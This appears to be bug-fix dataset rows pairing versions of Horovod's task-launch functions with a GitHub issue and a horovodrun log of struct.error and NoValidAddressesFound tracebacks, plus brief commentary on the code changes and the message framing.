self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39798)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Launching horovod task function was not successful:
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "/opt/conda/lib/python3.6/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 67, in <module>
_task_fn(index, driver_addresses, settings)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 27, in _task_fn
driver_addresses, settings.key, settings.verbose)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/driver/driver_service.py", line 44, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/service/driver_service.py", line 159, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 172, in __init__
'Linux.'.format(service_name=service_name, addresses=addresses))
horovod.run.common.util.network.NoValidAddressesFound: Horovod was unable to connect to horovod driver service on any of the following addresses: {'lo': [('127.0.0.1', 4548)], 'ens3': [('172.31.37.52', 4548)], 'docker0': [('172.17.0.1', 4548)]}.
One possible cause of this problem is that horovod currently requires every host to have at least one routable network interface with the same name across all of the hosts. You can run "ifconfig -a" on every host and check for the common routable interface. To fix the problem, you can rename interfaces on Linux.
|
struct.error
|
def _launch_task_servers(all_host_names, local_host_names, driver_addresses, settings):
    """
    Executes the task server and service client task for registration on the
    hosts.
    :param all_host_names: list of addresses. For example,
        ['worker-0','worker-1']
        ['10.11.11.11', '10.11.11.12']
    :type all_host_names: list(string)
    :param local_host_names: names that are resolved to one of the addresses
        of local hosts interfaces. For example,
        set(['localhost', '127.0.0.1'])
    :type local_host_names: set
    :param driver_addresses: map of interfaces and their address and port for
        the service. For example:
        {
            'lo': [('127.0.0.1', 34588)],
            'docker0': [('172.122.10.1', 34588)],
            'eth0': [('11.111.33.73', 34588)]
        }
    :type driver_addresses: map
    :param settings: the object that contains the settings for running horovod
    :type settings: horovod.run.common.util.settings.Settings
    :return:
    :rtype:
    """

    def _exec_command(command):
        host_output = io.StringIO()
        try:
            exit_code = safe_shell_exec.execute(
                command, stdout=host_output, stderr=host_output
            )
            if exit_code != 0:
                print(
                    "Launching horovod task function was not "
                    "successful:\n{host_output}".format(
                        host_output=host_output.getvalue()
                    )
                )
                os._exit(exit_code)
        finally:
            host_output.close()
        return exit_code

    if settings.ssh_port:
        ssh_port_arg = "-p {ssh_port}".format(ssh_port=settings.ssh_port)
    else:
        ssh_port_arg = ""
    args_list = []
    num_hosts = len(all_host_names)
    for index in range(num_hosts):
        host_name = all_host_names[index]
        if host_name in local_host_names:
            command = (
                "{python} -m horovod.run.task_fn {index} {num_hosts} "
                "{driver_addresses} {settings}".format(
                    python=sys.executable,
                    index=codec.dumps_base64(index),
                    num_hosts=codec.dumps_base64(num_hosts),
                    driver_addresses=codec.dumps_base64(driver_addresses),
                    settings=codec.dumps_base64(settings),
                )
            )
        else:
            command = (
                "ssh -o PasswordAuthentication=no -o StrictHostKeyChecking=no "
                "{host} {ssh_port_arg} "
                "'{python} -m horovod.run.task_fn {index} {num_hosts} "
                "{driver_addresses} {settings}'".format(
                    host=host_name,
                    ssh_port_arg=ssh_port_arg,
                    python=sys.executable,
                    index=codec.dumps_base64(index),
                    num_hosts=codec.dumps_base64(num_hosts),
                    driver_addresses=codec.dumps_base64(driver_addresses),
                    settings=codec.dumps_base64(settings),
                )
            )
        if settings.verbose >= 2:
            print("Launching horovod task function: {}".format(command))
        args_list.append([command])
    # Each thread will use an ssh command to launch the server on one task. If an
    # error occurs in one thread, the entire process will be terminated. Otherwise,
    # threads will keep running, and the ssh session -- and the task server --
    # will be bound to the thread. In case the horovod process dies, all
    # the ssh sessions and all the task servers will die as well.
    threads.execute_function_multithreaded(
        _exec_command, args_list, block_until_all_done=False
    )
|
def _launch_task_servers(all_host_names, local_host_names, driver_addresses, settings):
    """
    Executes the task server and service client task for registration on the
    hosts.
    :param all_host_names: list of addresses. For example,
        ['worker-0','worker-1']
        ['10.11.11.11', '10.11.11.12']
    :type all_host_names: list(string)
    :param local_host_names: names that are resolved to one of the addresses
        of local hosts interfaces. For example,
        set(['localhost', '127.0.0.1'])
    :type local_host_names: set
    :param driver_addresses: map of interfaces and their address and port for
        the service. For example:
        {
            'lo': [('127.0.0.1', 34588)],
            'docker0': [('172.122.10.1', 34588)],
            'eth0': [('11.111.33.73', 34588)]
        }
    :type driver_addresses: map
    :param settings: the object that contains the settings for running horovod
    :type settings: horovod.run.common.util.settings.Settings
    :return:
    :rtype:
    """

    def _exec_command(command):
        host_output = io.StringIO()
        try:
            exit_code = safe_shell_exec.execute(
                command, stdout=host_output, stderr=host_output
            )
            if exit_code != 0:
                print(
                    "Launching horovod task function was not "
                    "successful:\n{host_output}".format(
                        host_output=host_output.getvalue()
                    )
                )
                os._exit(exit_code)
        finally:
            host_output.close()
        return exit_code

    if settings.ssh_port:
        ssh_port_arg = "-p {ssh_port}".format(ssh_port=settings.ssh_port)
    else:
        ssh_port_arg = ""
    args_list = []
    for index in range(len(all_host_names)):
        host_name = all_host_names[index]
        if host_name in local_host_names:
            command = (
                "{python} -m horovod.run.task_fn {index} "
                "{driver_addresses} {settings}".format(
                    python=sys.executable,
                    index=codec.dumps_base64(index),
                    driver_addresses=codec.dumps_base64(driver_addresses),
                    settings=codec.dumps_base64(settings),
                )
            )
        else:
            command = (
                "ssh -o StrictHostKeyChecking=no {host} {ssh_port_arg} "
                "'{python} -m horovod.run.task_fn {index} {driver_addresses}"
                " {settings}'".format(
                    host=host_name,
                    ssh_port_arg=ssh_port_arg,
                    python=sys.executable,
                    index=codec.dumps_base64(index),
                    driver_addresses=codec.dumps_base64(driver_addresses),
                    settings=codec.dumps_base64(settings),
                )
            )
        args_list.append([command])
    # Each thread will use an ssh command to launch the server on one task. If an
    # error occurs in one thread, the entire process will be terminated. Otherwise,
    # threads will keep running, and the ssh session -- and the task server --
    # will be bound to the thread. In case the horovod process dies, all
    # the ssh sessions and all the task servers will die as well.
    threads.execute_function_multithreaded(
        _exec_command, args_list, block_until_all_done=False
    )
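Relative to the old version, the merged _launch_task_servers also passes num_hosts to each horovod.run.task_fn invocation, disables password prompts with -o PasswordAuthentication=no, and logs each command when verbose. The launch skeleton is unchanged: build one shell command per host and fire each from its own thread. A minimal self-contained sketch of that fan-out; run_on_hosts and the echo commands are illustrative, not Horovod code:

import subprocess
import threading

def run_on_hosts(commands):
    # One thread per host command; the function returns immediately while
    # the threads keep running, like block_until_all_done=False above.
    for cmd in commands:
        threading.Thread(
            target=subprocess.run, args=(cmd,), kwargs={"shell": True}
        ).start()

run_on_hosts(["echo task 0", "echo task 1"])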
|
https://github.com/horovod/horovod/issues/1969
|
root@ip-172-31-37-52:/# horovodrun -np 2 -H localhost:1,172.31.35.37:1 -p 12345 --verbose ls
Filtering local host names.
Remote host found: 172.31.35.37
Checking ssh on all remote hosts.
SSH was successful into all the remote hosts.
Testing interfaces on all the hosts.
Launched horovod server.
Attempted to launch horovod task servers.
Waiting for the hosts to acknowledge.
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37436)
Exception happened during processing of request from ('172.31.37.52', 52632)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52636)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
Traceback (most recent call last):
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55358)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52642)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Exception happened during processing of request from ('127.0.0.1', 37442)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
struct.error: unpack requires a buffer of 4 bytes
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55364)
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37448)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55368)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39790)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39796)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39798)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Launching horovod task function was not successful:
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/runpy.py", line 193, in _run_module_as_main
"__main__", mod_spec)
File "/opt/conda/lib/python3.6/runpy.py", line 85, in _run_code
exec(code, run_globals)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 67, in <module>
_task_fn(index, driver_addresses, settings)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/task_fn.py", line 27, in _task_fn
driver_addresses, settings.key, settings.verbose)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/driver/driver_service.py", line 44, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/service/driver_service.py", line 159, in __init__
match_intf=match_intf)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 172, in __init__
'Linux.'.format(service_name=service_name, addresses=addresses))
horovod.run.common.util.network.NoValidAddressesFound: Horovod was unable to connect to horovod driver service on any of the following addresses: {'lo': [('127.0.0.1', 4548)], 'ens3': [('172.31.37.52', 4548)], 'docker0': [('172.17.0.1', 4548)]}.
One possible cause of this problem is that horovod currently requires every host to have at least one routable network interface with the same name across all of the hosts. You can run "ifconfig -a" on every host and check for the common routable interface. To fix the problem, you can rename interfaces on Linux.
|
struct.error
|
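The repeated struct.error entries in the traceback above all come from network.py reading a 4-byte length prefix from a connection that was closed before a full header arrived. A minimal sketch of that length-prefixed framing pattern, with function names chosen for illustration only:

# Minimal sketch of the length-prefixed framing behind the
# `struct.unpack('i', rfile.read(4))` call seen in the traceback. The
# function names here are illustrative, not horovod's actual API.
import io
import struct


def write_message(wfile, payload):
    # Prefix the payload with its length as a 4-byte native int.
    wfile.write(struct.pack("i", len(payload)))
    wfile.write(payload)


def read_message(rfile):
    header = rfile.read(4)
    if len(header) < 4:
        # The peer closed the connection before sending a full header.
        # Unpacking the short read is what produces:
        #   struct.error: unpack requires a buffer of 4 bytes
        raise ConnectionError("peer closed the connection mid-header")
    (message_len,) = struct.unpack("i", header)
    return rfile.read(message_len)


buf = io.BytesIO()
write_message(buf, b"hello")
buf.seek(0)
assert read_message(buf) == b"hello"

try:
    read_message(io.BytesIO())  # empty stream: no header at all
except ConnectionError as err:
    print(err)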
def _exec_command_fn(settings):
"""
executes the jobs defined by run command on hosts.
:param hosts_alloc: list of dict indicating the allocating info.
For example,
[{'Hostname':'worker-0', 'Rank': 0, 'Local_rank': 0, 'Cross_rank':0,
'Size':2, 'Local_size':1, 'Cross_size':2},
{'Hostname':'worker-1', 'Rank': 1, 'Local_rank': 0, 'Cross_rank':1,
'Size':2, 'Local_size':1, 'Cross_size':2}
]
:type hosts_alloc: list(dict)
:param remote_host_names: names that are resolved to one of the addresses
of remote hosts interfaces.
:type remote_host_names: set
:param _run_command: command to execute
:type _run_command: string
:return:
:rtype:
"""
ssh_port_arg = (
"-p {ssh_port}".format(ssh_port=settings.ssh_port) if settings.ssh_port else ""
)
def _exec_command(command, slot_info, events):
index = slot_info.rank
host_name = slot_info.hostname
host_address = network.resolve_host_address(host_name)
local_addresses = network.get_local_host_addresses()
if host_address not in local_addresses:
command = (
"ssh -o PasswordAuthentication=no -o StrictHostKeyChecking=no "
"{host} {ssh_port_arg} "
"{local_command}".format(
host=host_name,
ssh_port_arg=ssh_port_arg,
local_command=quote(
"cd {pwd} > /dev/null 2>&1 ; {local_command}".format(
pwd=os.getcwd(), local_command=command
)
),
)
)
if settings.verbose:
print(command)
# Redirect output if requested
stdout = stderr = None
stdout_file = stderr_file = None
if settings.output_filename:
padded_rank = _pad_rank(index, settings.num_proc)
output_dir_rank = os.path.join(
settings.output_filename, "rank.{rank}".format(rank=padded_rank)
)
if not os.path.exists(output_dir_rank):
os.mkdir(output_dir_rank)
stdout_file = open(os.path.join(output_dir_rank, "stdout"), "w")
stderr_file = open(os.path.join(output_dir_rank, "stderr"), "w")
stdout = MultiFile([sys.stdout, stdout_file])
stderr = MultiFile([sys.stderr, stderr_file])
try:
exit_code = safe_shell_exec.execute(
command, index=index, stdout=stdout, stderr=stderr, events=events
)
if exit_code != 0:
print(
"Process {idx} exit with status code {ec}.".format(
idx=index, ec=exit_code
)
)
except Exception as e:
print(
"Exception happened during safe_shell_exec, exception "
"message: {message}".format(message=e)
)
exit_code = 1
finally:
if stdout_file:
stdout_file.close()
if stderr_file:
stderr_file.close()
return exit_code, time.time()
return _exec_command
|
def _exec_command_fn(settings):
"""
executes the jobs defined by run command on hosts.
:param hosts_alloc: list of dict indicating the allocating info.
For example,
[{'Hostname':'worker-0', 'Rank': 0, 'Local_rank': 0, 'Cross_rank':0,
'Size':2, 'Local_size':1, 'Cross_size':2},
{'Hostname':'worker-1', 'Rank': 1, 'Local_rank': 0, 'Cross_rank':1,
'Size':2, 'Local_size':1, 'Cross_size':2}
]
:type hosts_alloc: list(dict)
:param remote_host_names: names that are resolved to one of the addresses
of remote hosts interfaces.
:type remote_host_names: set
:param _run_command: command to execute
:type _run_command: string
:return:
:rtype:
"""
ssh_port_arg = (
"-p {ssh_port}".format(ssh_port=settings.ssh_port) if settings.ssh_port else ""
)
def _exec_command(command, slot_info, events):
index = slot_info.rank
host_name = slot_info.hostname
host_address = network.resolve_host_address(host_name)
local_addresses = network.get_local_host_addresses()
if host_address not in local_addresses:
command = (
"ssh -o StrictHostKeyChecking=no {host} {ssh_port_arg} "
"{local_command}".format(
host=host_name,
ssh_port_arg=ssh_port_arg,
local_command=quote(
"cd {pwd} > /dev/null 2>&1 ; {local_command}".format(
pwd=os.getcwd(), local_command=command
)
),
)
)
if settings.verbose:
print(command)
# Redirect output if requested
stdout = stderr = None
stdout_file = stderr_file = None
if settings.output_filename:
padded_rank = _pad_rank(index, settings.num_proc)
output_dir_rank = os.path.join(
settings.output_filename, "rank.{rank}".format(rank=padded_rank)
)
if not os.path.exists(output_dir_rank):
os.mkdir(output_dir_rank)
stdout_file = open(os.path.join(output_dir_rank, "stdout"), "w")
stderr_file = open(os.path.join(output_dir_rank, "stderr"), "w")
stdout = MultiFile([sys.stdout, stdout_file])
stderr = MultiFile([sys.stderr, stderr_file])
try:
exit_code = safe_shell_exec.execute(
command, index=index, stdout=stdout, stderr=stderr, events=events
)
if exit_code != 0:
print(
"Process {idx} exit with status code {ec}.".format(
idx=index, ec=exit_code
)
)
except Exception as e:
print(
"Exception happened during safe_shell_exec, exception "
"message: {message}".format(message=e)
)
exit_code = 1
finally:
if stdout_file:
stdout_file.close()
if stderr_file:
stderr_file.close()
return exit_code, time.time()
return _exec_command
|
https://github.com/horovod/horovod/issues/1969
|
root@ip-172-31-37-52:/# horovodrun -np 2 -H localhost:1,172.31.35.37:1 -p 12345 --verbose ls
Filtering local host names.
Remote host found: 172.31.35.37
Checking ssh on all remote hosts.
SSH was successful into all the remote hosts.
Testing interfaces on all the hosts.
Launched horovod server.
Attempted to launch horovod task servers.
Waiting for the hosts to acknowledge.
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37436)
Exception happened during processing of request from ('172.31.37.52', 52632)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52636)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
Traceback (most recent call last):
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55358)
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 52642)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
Exception happened during processing of request from ('127.0.0.1', 37442)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
struct.error: unpack requires a buffer of 4 bytes
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55364)
----------------------------------------
Exception happened during processing of request from ('127.0.0.1', 37448)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
----------------------------------------
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.37.52', 55368)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
File "/opt/conda/lib/python3.6/socketserver.py", line 364, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/opt/conda/lib/python3.6/socketserver.py", line 724, in __init__
self.handle()
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 105, in handle
req = server._wire.read(self.rfile)
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
File "/opt/conda/lib/python3.6/site-packages/horovod/run/common/util/network.py", line 79, in read
message_len = struct.unpack('i', rfile.read(4))[0]
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
struct.error: unpack requires a buffer of 4 bytes
----------------------------------------
----------------------------------------
Exception happened during processing of request from ('172.31.35.37', 39790)
Traceback (most recent call last):
File "/opt/conda/lib/python3.6/socketserver.py", line 654, in process_request_thread
self.finish_request(request, client_address)
